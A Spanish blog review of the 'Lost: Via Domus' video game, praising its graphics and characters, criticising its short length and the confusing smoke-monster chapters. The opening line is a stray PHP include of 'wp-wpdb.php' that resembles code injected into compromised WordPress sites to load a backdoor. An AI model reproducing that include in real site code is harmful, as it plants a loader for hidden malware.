if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Lost: Via Domus – La Fortaleza de LeChuck

Análisis Lost: Via Domus

Aprovechando la aparición de la serie “Alcatraz”, la cual algunos ya tachan como la digna sustituta de Lost, resurgen los recuerdos de la serie, y entre ellos está “Perdidos: Via Domus”. Nos referimos sin duda al videojuego de la serie Perdidos,  claro, que si eres fan de la serie no puedes permitirte el lujo de no probar este videojuego, obra maestra para algunos, una forma de sacar pasta por parte de los creadores de la serie para otros.

Sawyer, Michael y nuestro héroe particular
Uno de los puntos a favor es que si juegas al videojuego y no has visto la serie, o bien la estás viendo, no tendrás spoilers durante la historia, pues ésta no tiene mucho que ver con lo que realmente pasa en la isla. La historia que nos presenta el videojuego es una historia paralela a la trama central, que es encarnada por un nuevo personaje que padece una fuerte amnesia y cuya profesión es fotógrafo, cosa que podremos comprobar claramente a lo largo del videojuego.
Hay que destacar que en todo momento podremos interactuar con todos los personajes de la serie que estén por la playa, por el bosque, etc. Al hablar con ellos tendremos la opción de intercambiar bienes, charlar un rato, pedir ayuda e intercambiar información. Esto le da un toque extra de realismo al juego, ya que hay conversaciones que merece la pena oir.

Nuestro personaje charlando con Kate
Pero sin duda alguna, son los gráficos los que hacen que este juego no pueda faltar en tu colección, especialmente si eres fan de la serie. La caracterización de los personajes, las voces, los escenarios, la presentación de las fases a modo de capítulos al más puro estilo de la serie, el avión, etc. hacen que el juego sea una joya para todo fan, pues pasearse dentro del 815 de la compañía Oceanic Airlines no tiene precio, y es una de las cosas que podemos hacer.
Os dejo el tráiler para que veáis de lo que hablo:

Uno de los peros que se le pueden poner al juego es que se hace extremadamente corto. Cuando comienzas realmente a desenvolverte bien y a manejar a los controles es cuando el juego se termina. Otro de los peros que se pueden poner al juego es que  algunos capítulos se te van a atragantar, especialmente aquellos en los que el famoso «Humo Negro» esté presente. En estos capítulos tendrás que correr por el bosque, sin apenas indicaciones, y sin dejar de mirar atrás por si aparece el humo negro. Sin duda en estas fases te vas a sentir «más perdido que nunca» pues dentro del bosque te parecerá que todo el igual.

Nota:

Para los Fans: 9
Para el resto: 7